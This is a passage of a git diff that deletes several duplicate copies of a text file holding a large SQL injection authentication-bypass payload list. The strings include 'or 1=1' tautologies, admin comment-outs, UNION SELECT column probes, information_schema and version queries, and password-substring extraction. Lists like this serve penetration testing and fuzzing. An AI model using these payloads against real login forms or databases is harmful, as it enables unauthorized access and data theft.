-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
